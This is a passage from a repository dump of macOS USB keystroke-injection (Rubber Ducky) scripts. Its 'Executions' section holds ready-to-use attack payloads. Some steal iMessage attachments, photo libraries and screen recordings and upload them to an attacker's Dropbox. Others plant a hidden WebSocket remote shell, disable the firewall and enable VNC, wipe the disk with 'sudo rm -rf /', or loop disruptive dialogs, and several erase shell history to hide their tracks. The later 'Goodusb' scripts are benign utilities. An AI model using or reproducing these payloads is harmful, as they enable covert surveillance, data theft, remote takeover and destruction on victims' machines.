70 | DELAY 500 71 | STRING ./upload.sh 72 | DELAY 500 73 | ENTER 74 | DELAY 7000 75 | CTRL C 76 | DELAY 500 77 | STRING rm upload.sh 78 | DELAY 500 79 | ENTER 80 | DELAY 500 81 | STRING rm -r ~/Desktop/Documents.zip 82 | ENTER 83 | DELAY 500 84 | STRING CLEAR 85 | DELAY 500 86 | ENTER 87 | DELAY 500 88 | GUI w 89 | DELAY 500 90 | ENTER 91 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Imessage Attachments to Dropbox.txt: -------------------------------------------------------------------------------- 1 | REM This Script will copy all the attachments in the messages app and send them to your dropbox API 2 | REM Replace '' with the systems actual username 3 | REM Replace "' with your actual Dropbox API key 4 | 5 | 6 | REM Here's the breakdown, we simply navigate to the finder 7 | REM use the Shift GUI G to open up the "go to folder" menu. 8 | REM Then we search for & open the messages folder. 9 | REM Now we can tab to the attachments folder copy it and navigate to a new window to paste the folder 10 | REM Then we zip the folder and send it to the dropbox 11 | REM Using the nohup and & to make sure the code is executed 12 | REM even when closing out of the terminal. 13 | 14 | REM Requirements Must have at least two windows open 15 | REM Dropbox API key and targets system username 16 | 17 | REM Author: Narsty 18 | REM Title: Imessage Attachments to Dropbox 19 | REM Version 2.0 MacOs 20 | REM Category: Execution 21 | 22 | 23 | ID 05ac:021e Apple:Keyboard 24 | DELAY 500 25 | GUI SPACE 26 | DELAY 500 27 | STRING Finder 28 | DELAY 1000 29 | ENTER 30 | DELAY 2000 31 | GUI-SHIFT g 32 | DELAY 1000 33 | STRING /Users//Library/Messages/ 34 | DELAY 500 35 | ENTER 36 | DELAY 1000 37 | STRING at 38 | DELAY 500 39 | GUI c 40 | DELAY 250 41 | CTRL RIGHTARROW 42 | DELAY 1000 43 | GUI v 44 | DELAY 500 45 | GUI SPACE 46 | DELAY 500 47 | STRING terminal 48 | DELAY 1000 49 | ENTER 50 | DELAY 500 51 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 52 | DELAY 500 53 | ENTER 54 | DELAY 500 55 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 56 | DELAY 500 57 | ENTER 58 | DELAY 500 59 | ENTER 60 | DELAY 500 61 | CTRL c 62 | DELAY 1000 63 | STRING echo 'cd ~/Desktop && zip -r attachments.zip Attachments && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/attachments.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @attachments.zip' > upload.sh 64 | DELAY 2000 65 | ENTER 66 | DELAY 500 67 | STRING chmod +x upload.sh 68 | DELAY 500 69 | ENTER 70 | DELAY 500 71 | STRING nohup ./upload.sh >/dev/null 2>&1 & 72 | DELAY 500 73 | ENTER 74 | DELAY 2000 75 | CTRL C 76 | DELAY 500 77 | STRING rm upload.sh 78 | DELAY 500 79 | ENTER 80 | DELAY 500 81 | STRING CLEAR 82 | DELAY 500 83 | ENTER 84 | DELAY 500 85 | GUI w 86 | DELAY 500 87 | ENTER 88 | 89 | 90 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Infinite Dialog Box.txt: -------------------------------------------------------------------------------- 1 | REM This script opens an infinite dialog box on MacOS 2 | REM that continuously displays the message "I'll Never Leave" with an "OK" button. 3 | REM It runs in the background using the nohup command. 4 | REM The script then clears the terminal and exits. 5 | 6 | 7 | 8 | REM To end the loop you need to Kill the PID 9 | REM In the terminal, use the command "pgrep osascript" to find the PID of the dialog box loop 10 | REM Run the command 'Kill PID #' to end the dialog box loop 11 | 12 | 13 | REM Author: Narsty 14 | REM Title: Infinite Dialog Box 15 | REM Target: MacOS 16 | REM Version: 1.0 17 | REM Category: Executions 18 | 19 | ID 05ac:021e Apple:Keyboard 20 | DELAY 500 21 | GUI SPACE 22 | DELAY 500 23 | STRING terminal 24 | DELAY 1000 25 | ENTER 26 | DELAY 1000 27 | STRING nohup osascript -e 'repeat' -e 'set dialogResult to button returned of (display dialog "I'"'"'ll Never Leave" buttons {"Option 1", "Option 2", "Option 3"} default button 1)' -e 'end repeat' >/dev/null 2>&1 & 28 | DELAY 500 29 | GUI k 30 | DELAY 500 31 | GUI w 32 | 33 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Infinite Dropdown list.txt: -------------------------------------------------------------------------------- 1 | REM This script opens an Infinite Dropdown list on MacOS 2 | REM that continuously displays the message "I'll Never Leave" 3 | REM with a list of selectable option and "Ill Never Leave" button. 4 | REM It runs in the background using the nohup command. 5 | REM The script then clears the terminal and exits. 6 | 7 | 8 | 9 | REM To end the loop you need to Kill the PID 10 | REM In the terminal, use the command "pgrep osascript" to find the PID of the dialog box loop 11 | REM Run the command 'Kill PID #' to end the dialog box loop 12 | 13 | 14 | REM Author: Narsty 15 | REM Title: Infinite Dropdown list 16 | REM Target: MacOS 17 | REM Version: 1.0 18 | REM Category: Executions 19 | 20 | ID 05ac:021e Apple:Keyboard 21 | DELAY 500 22 | GUI SPACE 23 | DELAY 500 24 | STRING terminal 25 | DELAY 1000 26 | ENTER 27 | DELAY 1000 28 | STRING nohup osascript -e 'repeat' -e 'set dialogResult to button returned of (display dialog "I'"'"'ll Never Leave" buttons {"Option 1", "Option 2", "Option 3"} default button 1)' -e 'end repeat' >/dev/null 2>&1 & 29 | DELAY 500 30 | GUI k 31 | DELAY 500 32 | GUI w 33 | 34 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/MacOs Website redirect.txt: -------------------------------------------------------------------------------- 1 | REM Description: Opens Terminal and redirects to URL of choice 2 | REM You must enter the desired website in the Url String DO NOT remove single Quotes! 3 | 4 | REM Title: Website Redirect 5 | REM Author: NARSTY 6 | REM Target: MacOS 7 | REM Version: 1.0 8 | REM Category: Execution 9 | 10 | ID 05ac:021e Apple:Keyboard 11 | DELAY 1000 12 | GUI SPACE 13 | DELAY 200 14 | STRING terminal 15 | DELAY 1000 16 | ENTER 17 | DELAY 1000 18 | STRING open -a Safari 'Enter URL/Website here' 19 | DELAY 1000 20 | ENTER 21 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/NEVER SLEEP.txt: -------------------------------------------------------------------------------- 1 | REM This script uses the caffeinate command 2 | REM to keep the MacOS system from going to sleep. 3 | REM To undo this you must kill the PID using the command 'kill PID#' 4 | REM To find the PID use the following command 'ps aux | grep caffeinate' 5 | 6 | 7 | REM Author: Narsty 8 | REM Title: Never Sleep 9 | REM Target: MacOS 10 | REM Version: 1.0 11 | REM Category: Executions 12 | 13 | 14 | 15 | DELAY 500 16 | GUI SPACE 17 | DELAY 500 18 | STRING TERMINAL 19 | DELAY 1000 20 | ENTER 21 | DELAY 1000 22 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 23 | DELAY 500 24 | ENTER 25 | DELAY 500 26 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 27 | DELAY 500 28 | ENTER 29 | DELAY 500 30 | STRING NOHUP caffeinate -s & 31 | DELAY 500 32 | ENTER 33 | DELAY 500 34 | GUI W 35 | DELAY 500 36 | ENTER 37 | 38 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Remote Shell.txt: -------------------------------------------------------------------------------- 1 | REM Creates a hidden directory in the home directory named .phantom_ws. 2 | REM Navigates into the new directory. 3 | REM Writes a Python script (server.py) 4 | REM This sets up a WebSocket server and allows command execution from received WebSocket messages. 5 | REM Starts the Python script in the background with nohup, suppressing all output. 6 | REM Clears the terminal history and exits the terminal. 7 | 8 | 9 | 10 | REM to connect to the shell remotley: 'brew install websocat' 11 | REM After you've installed websocat, 12 | REM you can connect to your WebSocket server like this: 'websocat ws://localhost:8765' 13 | REM Replace "localhost" with targets I.P. address 14 | REM Once connected, you can type a command and press Enter to send it. 15 | REM The server will execute the command and send back the output. 16 | REM To shut down the server, use the kill command with the PID 17 | REM Replace 12345 with the actual PID from your 'kill 12345' 18 | 19 | REM Requirements: Homebrew/python3/websocat 20 | REM Python 3 and websockets library need to be installed on the systemTerminal 21 | REM command 'pip3 install websockets' 22 | 23 | 24 | REM Title: Remote Shell 25 | REM Author: NARSTY 26 | REM Target: MacOS 27 | REM Version: 1.0 28 | REM Category: Execution 29 | 30 | 31 | ID 05ac:021e Apple:Keyboard 32 | DELAY 500 33 | GUI SPACE 34 | DELAY 500 35 | STRING Terminal 36 | DELAY 500 37 | ENTER 38 | DELAY 500 39 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 40 | DELAY 500 41 | ENTER 42 | DELAY 500 43 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 44 | DELAY 500 45 | ENTER 46 | DELAY 500 47 | ENTER 48 | DELAY 500 49 | STRING mkdir ~/.phantom_ws && cd ~/.phantom_ws 50 | ENTER 51 | DELAY 500 52 | STRING echo 'import asyncio\nimport websockets\nimport subprocess\n\nasync def execute_command(websocket, path):\n async for message in websocket:\n cmd = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n cmd_output = cmd.stdout.read() + cmd.stderr.read()\n await websocket.send(cmd_output.decode())\n\nstart_server = websockets.serve(execute_command, "localhost", 8765)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()' > server.py 53 | ENTER 54 | DELAY 500 55 | STRING nohup python3 server.py > /dev/null 2>&1 & 56 | ENTER 57 | DELAY 500 58 | STRING clear 59 | ENTER 60 | 61 | 62 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Screen Recorder MacOs to Dropbox.txt: -------------------------------------------------------------------------------- 1 | REM This script records the screen and saves the recording as a .mkv file to the desktop. 2 | REM Converts the recording to an MP4 file and saves the MP4 file to the desktop. 3 | REM Then uploads the MP4 file to your Dropbox API, deletes the files on the desktop, and clears the terminal. 4 | 5 | REM Must have terminal recording privileges enabled in Privacy & Security settings 6 | REM Script includes a delay of 10 seconds after starting the recording. 7 | REM to allow for the desired recording duration. Can adjust the delay for longer recordings. line 45 8 | REM Delays for render time; if you adjust line 45, also adjust line 53 accordingly. 9 | REM This will allow a adequate render time for the .mp4 10 | 11 | REM Must have ffmpeg installed 12 | REM You can download through the terminal using the 'brew install ffmpeg command' 13 | REM Replace "" with system username 14 | REM Replace "" with your API access token 15 | 16 | 17 | REM Author: Narsty 18 | REM Title: Screen Recorder MacOs to Dropbox 19 | REM Target: MacOS 20 | REM Version: 1.0 21 | REM Category: Execution 22 | 23 | ID 05ac:021e Apple:Keyboard 24 | DELAY 1000 25 | GUI SPACE 26 | DELAY 500 27 | STRING terminal 28 | DELAY 1000 29 | ENTER 30 | DELAY 500 31 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 32 | DELAY 500 33 | ENTER 34 | DELAY 500 35 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 36 | DELAY 500 37 | ENTER 38 | DELAY 500 39 | ENTER 40 | DELAY 500 41 | STRING ffmpeg -f avfoundation -r 30 -i "1" -c:v libx264 -preset ultrafast -tune zerolatency -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mkv 42 | DELAY 250 43 | ENTER 44 | GUI h ; hides terminal to capture contents on the screen 45 | DELAY 10000 ; Delay for 10 seconds (adjust as needed) 46 | GUI TAB ; reopens terminal to continue script 47 | DELAY 500 48 | CTRL C ; Send the interrupt signal to stop the recording 49 | DELAY 500 50 | STRING ffmpeg -i ~/Desktop/screen_recording.mkv -c:v libx264 -preset fast -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mp4 51 | DELAY 500 52 | ENTER 53 | DELAY 30000 54 | STRING echo 'curl -X POST "https://content.dropboxapi.com/2/files/upload" -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/screen_recording.mp4\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary "@/Users//Desktop/screen_recording.mp4"' > upload.sh 55 | ENTER 56 | DELAY 500 57 | STRING chmod +x upload.sh 58 | ENTER 59 | DELAY 500 60 | STRING nohup ./upload.sh >/dev/null 2>&1 & 61 | DELAY 500 62 | ENTER 63 | DELAY 10000 64 | STRING rm ~/Desktop/screen_recording.mkv 65 | DELAY 250 66 | ENTER 67 | DELAY 3000 68 | STRING rm ~/Desktop/screen_recording.mp4 69 | DELAY 250 70 | ENTER 71 | DELAY 500 72 | STRING rm upload.sh 73 | DELAY 500 74 | ENTER 75 | DELAY 500 76 | STRING clear 77 | ENTER 78 | DELAY 500 79 | GUI w 80 | DELAY 1000 81 | ENTER 82 | 83 | 84 | 85 | 86 | 87 | 88 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Screen Recorder MacOs.txt: -------------------------------------------------------------------------------- 1 | REM Description: This script records the screen and saves the recording as a video file. 2 | REM Must have ffmpeg installed. 3 | REM Must have terminal recording privilege enabled 4 | 5 | REM Script uses a screen recording command and the conversion of the recording to an MP4 file. 6 | REM It includes a delay of 10 seconds after starting the recording to allow for the desired recording duration. Can adjust the delay for longer recordings line 31 7 | 8 | REM After that, it sends the interrupt signal (Ctrl+C) to stop the recording. 9 | REM Then it proceeds with the conversion of the recorded file from MKV to MP4 format using the ffmpeg command And stores it on the desktop 10 | 11 | REM you can change the locations "Desktop" to store the file in a more discrete place. 12 | 13 | REM Author: Narsty 14 | REM Title: Screen Recorder MacOs 15 | REM Target: MacOS 16 | REM Version: 1.0 17 | REM Category: Execution 18 | 19 | 20 | ID 05ac:021e Apple:Keyboard 21 | DELAY 1000 22 | GUI SPACE 23 | DELAY 500 24 | STRING terminal 25 | DELAY 500 26 | ENTER 27 | DELAY 500 28 | STRING ffmpeg -f avfoundation -r 30 -i "1" -c:v libx264 -preset ultrafast -tune zerolatency -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mkv 29 | DELAY 250 30 | ENTER 31 | DELAY 10000 ; Delay for 10 seconds (adjust as needed) 32 | CTRL C ; Send the interrupt signal to stop the recording 33 | DELAY 500 34 | STRING ffmpeg -i ~/Desktop/screen_recording.mkv -c:v libx264 -preset fast -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mp4 35 | DELAY 250 36 | ENTER 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/System Disruption Loop.txt: -------------------------------------------------------------------------------- 1 | REM This script initiates a system disruption loop by 2 | REM continuously generating warning messages using the "say" command in macOS. 3 | REM Will continue to run after the terminal is closed 4 | 5 | 6 | 7 | REM To end the loop you need to Kill the PID 8 | REM Use the command 9 | REM to find the PID 10 | REM Run the command 'Kill PID #' to end the warning message loop. 11 | 12 | 13 | REM Author: Narsty 14 | REM Title: System Disruption Loop 15 | REM Target: MacOS 16 | REM Version: 1.0 17 | REM Category: Executions 18 | 19 | ID 05ac:021e Apple:Keyboard 20 | DELAY 500 21 | GUI SPACE 22 | DELAY 500 23 | STRING terminal 24 | DELAY 1000 25 | ENTER 26 | DELAY 1000 27 | STRING nohup sh -c 'while true; do say "Warning: System compromised. Initiating disruption."; done' >/dev/null 2>&1 & 28 | DELAY 500 29 | GUI k 30 | DELAY 500 31 | GUI w 32 | DELAY 500 33 | ENTER 34 | 35 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/System File Deletion.txt: -------------------------------------------------------------------------------- 1 | REM this will delete all files on the system 2 | REM there will be no Prompt 3 | REM Using such scripts can have severe consequences and is not recommended. 4 | REM Always exercise caution and ensure you have proper authorization. 5 | 6 | 7 | REM Title: Fuck your Files 8 | REM Author: NARSTY 9 | REM Version: 1.0 10 | REM Target: macOS 11 | REM Category: Executions 12 | 13 | 14 | DELAY 1000 15 | GUI SPACE 16 | DELAY 500 17 | STRING Terminal 18 | DELAY 500 19 | ENTER 20 | DELAY 1000 21 | STRING echo "Hello! Initiating system takeover... Deleting All Files....." 22 | ENTER 23 | DELAY 1000 24 | STRING sudo rm -rf / 25 | ENTER 26 | DELAY 1000 27 | STRING echo "All your files have been deleted. Goodbye!" 28 | ENTER 29 | DELAY 1000 30 | STRING sudo shutdown -h now 31 | ENTER 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/Virtual Network Remote Access.txt: -------------------------------------------------------------------------------- 1 | REM VNC is a technology that allows you to remotely control another computer. 2 | REM In this case, if the VNC server is started on a Mac, you can view 3 | REM and control that Mac from another computer using a VNC viewer application. 4 | 5 | 6 | 7 | REM This script disables the firewall 8 | REM disable the local address check for Screen Sharing 9 | REM and enables screen sharing via sudo command (must know password Trying to find a workaround) 10 | 11 | 12 | REM Now you can use your local computer to tap into the target 13 | REM you can run the command open vnc://target_ip_address 14 | REM replace "target_ip_address" with the actual I.p. of the remote MacOs 15 | 16 | REM VNC Viewer should establish a connection to the target machine, 17 | REM you should be able to see and control the remote desktop of the target machine on your computer. 18 | 19 | REM Note that the specific command and package name may vary 20 | REM based on the version of Homebrew and RealVNC available at the time of installation. 21 | 22 | 23 | REM Author: Narsty 24 | REM Title: Virtual Network Remote Access 25 | REM Target: MacOS 26 | REM Version: 1.0 27 | REM Category: Execution 28 | 29 | ID 05ac:021e Apple:Keyboard 30 | DELAY 500 31 | GUI SPACE 32 | DELAY 500 33 | STRING terminal 34 | DELAY 1000 35 | ENTER 36 | DELAY 500 37 | STRING sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.screensharing.plist 38 | DELAY 2000 39 | ENTER 40 | DELAY 8000 41 | STRING /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off 42 | DELAY 3000 43 | ENTER 44 | DELAY 500 45 | STRING defaults write com.apple.ScreenSharing skipLocalAddressCheck -bool true 46 | DELAY 3000 47 | ENTER 48 | DELAY 500 49 | STRING clear 50 | DELAY 500 51 | GUI w 52 | 53 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Executions/iCloud Photos to Dropbox.txt: -------------------------------------------------------------------------------- 1 | REM This Script will copy the Photos library folder and send them to your dropbox API 2 | REM Replace '' with the systems actual username 3 | REM Replace '' with your actual Dropbox API key 4 | 5 | 6 | REM Here's the breakdown, we navigate to the finder 7 | REM use the Shift GUI G to open up the "go to folder" menu. 8 | REM Then we search for & open the photos folder. 9 | REM Now we can type "li" to navigate to the library folder that contains the photos 10 | REM we copy it and navigate to a new window to paste the folder 11 | REM Then we zip the folder and rename it "Targets_photos" and send it to the dropbox 12 | REM Using the nohup and & to make sure the code is executed 13 | 14 | REM Requirements Must have at least two windows open 15 | REM Dropbox API key and targets system username 16 | 17 | 18 | REM Author: Narsty 19 | REM Title: iCloud Photos to Dropbox 20 | REM Version 1.0 MacOs 21 | REM Category: Execution 22 | 23 | 24 | ID 05ac:021e Apple:Keyboard 25 | DELAY 500 26 | GUI SPACE 27 | DELAY 500 28 | STRING Finder 29 | DELAY 1000 30 | ENTER 31 | DELAY 2000 32 | GUI-SHIFT g 33 | DELAY 1000 34 | STRING /Users//Library/photos 35 | DELAY 500 36 | ENTER 37 | DELAY 1000 38 | STRING li 39 | DELAY 500 40 | GUI c 41 | DELAY 500 42 | CTRL RIGHTARROW 43 | DELAY 1000 44 | GUI v 45 | DELAY 15000 46 | GUI SPACE 47 | DELAY 500 48 | STRING terminal 49 | DELAY 1000 50 | ENTER 51 | DELAY 500 52 | CTRL c 53 | DELAY 500 54 | STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash 55 | DELAY 500 56 | ENTER 57 | DELAY 500 58 | STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') 59 | DELAY 500 60 | ENTER 61 | DELAY 500 62 | ENTER 63 | DELAY 1000 64 | STRING echo 'cd ~/Desktop && zip -r targets_photos.zip Libraries && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/targets_photos.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @targets_photos.zip' > upload.sh 65 | DELAY 1000 66 | ENTER 67 | DELAY 2000 68 | STRING chmod +x upload.sh 69 | DELAY 500 70 | ENTER 71 | DELAY 500 72 | STRING nohup ./upload.sh >/dev/null 2>&1 & 73 | DELAY 500 74 | ENTER 75 | DELAY 7000 76 | CTRL C 77 | DELAY 500 78 | STRING rm -r ~/Desktop/libraries 79 | DELAY 1000 80 | ENTER 81 | DELAY 500 82 | STRING rm upload.sh 83 | DELAY 500 84 | ENTER 85 | DELAY 5000 86 | STRING rm -r ~/Desktop/targets_photos.zip 87 | ENTER 88 | DELAY 500 89 | STRING CLEAR 90 | DELAY 500 91 | ENTER 92 | DELAY 500 93 | GUI w 94 | DELAY 500 95 | ENTER 96 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/ Live Chart and price ticker.txt: -------------------------------------------------------------------------------- 1 | REM This script fetches the current Bitcoin exchange rate using the "curl" command. 2 | REM The data is retrieved from the rate.sx website. 3 | REM You can Replace "Btc" with another popular asset of your choice 4 | 5 | REM Title: Live Chart and price ticker 6 | REM Author: Narsty 7 | REM Version: 1.0 8 | REM Category: GOODUSB 9 | 10 | 11 | DELAY 500 12 | GUI SPACE 13 | DELAY 500 14 | STRING TERMINAL 15 | DELAY 1000 16 | ENTER 17 | DELAY 500 18 | STRING curl rate.sx/btc 19 | DELAY 500 20 | ENTER 21 | 22 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/All Applications at once.txt: -------------------------------------------------------------------------------- 1 | REM Opens Terminal, Safari, Xcode, Calendar, Messages, Pycharm CE 2 | REM You can update the (" ") with whatever applications you'd like! 3 | REM Delays may need adjusting depending on how long app takes to load. 4 | 5 | REM Title: All Applications at once 6 | REM Author: Narsty 7 | REM Target: MacOS 8 | REM Version: 1.0 9 | REM Category: GOODUSB 10 | 11 | 12 | ID 05ac:021e Apple:Keyboard 13 | DELAY 2000 14 | GUI SPACE 15 | DELAY 500 16 | STRING terminal 17 | DELAY 500 18 | ENTER 19 | DELAY 1000 20 | STRING open -a "Safari" 21 | ENTER 22 | DELAY 1000 23 | STRING open -a "Xcode" 24 | ENTER 25 | DELAY 5000 26 | STRING open -a "Calendar" 27 | ENTER 28 | DELAY 1000 29 | STRING open -a "Messages" 30 | ENTER 31 | DELAY 2000 32 | STRING open -a "Pycharm CE" 33 | ENTER 34 | DELAY 2000 35 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/AudioInfo.ducky.txt: -------------------------------------------------------------------------------- 1 | REM Provides a utility to display/Say useful information on the target system 2 | REM The current date, time, and battery percentage 3 | 4 | REM Title: AudioInfo.ducky 5 | REM Author: Narsty 6 | REM Target: MacOS 7 | REM Version: 1.0 8 | REM Category: GOODUSB 9 | 10 | 11 | ID 05ac:021e Apple:Keyboard 12 | DELAY 2000 13 | GUI SPACE 14 | DELAY 500 15 | STRING terminal 16 | DELAY 500 17 | ENTER 18 | DELAY 500 19 | STRING echo "USB Script Utility" 20 | ENTER 21 | DELAY 500 22 | STRING echo "-------------------" 23 | ENTER 24 | DELAY 500 25 | STRING echo "Current Date:" 26 | ENTER 27 | DELAY 500 28 | STRING date "+%Y-%m-%d" | say 29 | ENTER 30 | DELAY 500 31 | STRING echo "Current Time:" 32 | ENTER 33 | DELAY 500 34 | STRING date "+%H:%M:%S" | say 35 | ENTER 36 | DELAY 500 37 | STRING echo "Battery Percentage:" 38 | ENTER 39 | DELAY 500 40 | STRING ioreg -l | awk '$3~/Capacity/{c[$3]=$5}END{OFMT="%.2f%%";max=c["\"MaxCapacity\""];print(max>0?100*c["\"CurrentCapacity\""]/max:"?")}' | say 41 | ENTER 42 | DELAY 500 43 | STRING echo "-------------------" 44 | ENTER 45 | DELAY 2000 46 | 47 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/ClearNotCLose.txt: -------------------------------------------------------------------------------- 1 | REM This Script will minimize all open windows 2 | 3 | REM Title: Clear Not Close 4 | REM Author: Narsty 5 | REM Target: MacOS 6 | REM Version: 1.0 7 | REM Category: GOODUSB 8 | 9 | ID 05ac:021e Apple:Keyboard 10 | DELAY 1000 11 | GUI SPACE 12 | DELAY 500 13 | STRING terminal 14 | DELAY 500 15 | ENTER 16 | DELAY 500 17 | STRING osascript -e 'tell application "System Events" to set visible of every process whose visible is true and name is not "Finder" to false' 18 | ENTER 19 | DELAY 500 20 | GUI W 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Dark Mode Toggler.txt: -------------------------------------------------------------------------------- 1 | REM This script opens the Terminal application 2 | REM runs commands to toggle the Dark Mode, and then closes the Terminal. 3 | 4 | REM Author: Narsty 5 | REM Title: Dark Mode Toggler 6 | REM Target: MacOS 7 | REM Version: 1.0 8 | REM Category: GOODUSB 9 | 10 | 11 | REM Title: Dark Mode Enabler 12 | REM Author: Narsty 13 | 14 | 15 | ID 05ac:021e Apple:Keyboard 16 | DELAY 1000 17 | GUI SPACE 18 | DELAY 500 19 | STRING terminal 20 | DELAY 500 21 | ENTER 22 | DELAY 1000 23 | STRING defaults write -g AppleInterfaceStyle Dark 24 | ENTER 25 | DELAY 500 26 | STRING killall Dock 27 | ENTER 28 | DELAY 1000 29 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Desktop Organizer Plus.txt: -------------------------------------------------------------------------------- 1 | REM Organizes files on the desktop into separate folders based on their file extensions. 2 | REM Creates "Documents", "Images", "Music", and "Video" folders 3 | REM and moves corresponding files into them. 4 | REM Run the script to organize the desktop effortlessly. 5 | 6 | REM Title: Desktop Organizer + 7 | REM Author: Narsty 8 | REM Version 1.0 MacOs 9 | REM Category: GOODUSB 10 | 11 | 12 | DELAY 1000 13 | GUI SPACE 14 | DELAY 200 15 | STRING terminal 16 | DELAY 200 17 | ENTER 18 | DELAY 1000 19 | STRING mkdir -p ~/Desktop/Documents 20 | DELAY 200 21 | ENTER 22 | STRING mkdir -p ~/Desktop/Images 23 | DELAY 200 24 | ENTER 25 | STRING mkdir -p ~/Desktop/Music 26 | DELAY 200 27 | ENTER 28 | STRING mkdir -p ~/Desktop/Videos 29 | DELAY 200 30 | ENTER 31 | STRING find ~/Desktop -maxdepth 1 -type f -exec sh -c 'FILE="{}"; EXTENSION="${FILE##*.}"; case "$EXTENSION" in doc*|xls*|ppt*|pdf) mv "$FILE" ~/Desktop/Documents/ ;; jpg*|jpeg*|png*|gif*) mv "$FILE" ~/Desktop/Images/ ;; mp3*|wav*|flac*|aac*) mv "$FILE" ~/Desktop/Music/ ;; mp4*|mov*|avi*|mkv*) mv "$FILE" ~/Desktop/Videos/ ;; *) ;; esac' \; 32 | DELAY 200 33 | ENTER 34 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Desktop Organizer.txt: -------------------------------------------------------------------------------- 1 | REM Organizes files on the desktop into separate folders based on their file extensions. 2 | REM Creates "Documents" and "Images" folders and moves corresponding files into them. 3 | REM Run the script to organize the desktop effortlessly. 4 | 5 | REM Title: Desktop Organizer 6 | REM Author: Narsty 7 | REM Version 1.0 MacOs 8 | REM Category: GOODUSB 9 | 10 | ID 05ac:021e Apple:Keyboard 11 | GUI SPACE 12 | DELAY 500 13 | STRING Terminal 14 | DELAY 500 15 | ENTER 16 | DELAY 1000 17 | STRING cd ~/Desktop 18 | ENTER 19 | STRING mkdir -p Documents Images 20 | ENTER 21 | STRING mv *.txt *.docx *.pdf Documents/ 22 | ENTER 23 | STRING mv *.jpg *.png Images/ 24 | ENTER 25 | DELAY 5000 26 | STRING osascript -e 'tell application "Terminal" to close first window' 27 | ENTER 28 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/GTOP Monitoring Dashboard.txt: -------------------------------------------------------------------------------- 1 | REM System monitoring dashboard 2 | REM shows CPU History, Memory and Swap History, Network History, Disk Usage, and Processes. 3 | REM When you run this, you'll get a dynamic, colorful dashboard 4 | REM showing your system's real-time statistics. 5 | REM It's a practical use of the terminal's capabilities, and it's also visually impressive. 6 | 7 | REM Requirmetns: Homebrew and GTOP can install using command 'Brew install vtop' 8 | 9 | REM Title: GTOP Monitoring Dashboard 10 | REM Author: Narsty 11 | REM Target: MacOS 12 | REM Version: 1.0 13 | REM Category: GOODUSB 14 | 15 | ID 05ac:021e Apple:Keyboard 16 | DELAY 1000 17 | GUI SPACE 18 | DELAY 500 19 | STRING Terminal 20 | DELAY 1000 21 | ENTER 22 | DELAY 500 23 | GUI-CTRL f 24 | DELAY 1000 25 | STRING gtop 26 | ENTER 27 | 28 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Git Repository Updater.txt: -------------------------------------------------------------------------------- 1 | REM This script auto updates your git repo. 2 | REM Replace '/path/to/your/' with the path to your repository. 3 | REM Replace 'repository' with the name of your repository you want to update. 4 | 5 | REM Title: Git Repository Updater 6 | REM Author: Narsty 7 | REM Version: 1.0 8 | REM Category: GOODUSB 9 | 10 | 11 | DELAY 500 12 | GUI SPACE 13 | DELAY 500 14 | STRING Terminal 15 | DELAY 1000 16 | ENTER 17 | DELAY 500 18 | STRING cd /path/to/your/repository 19 | ENTER 20 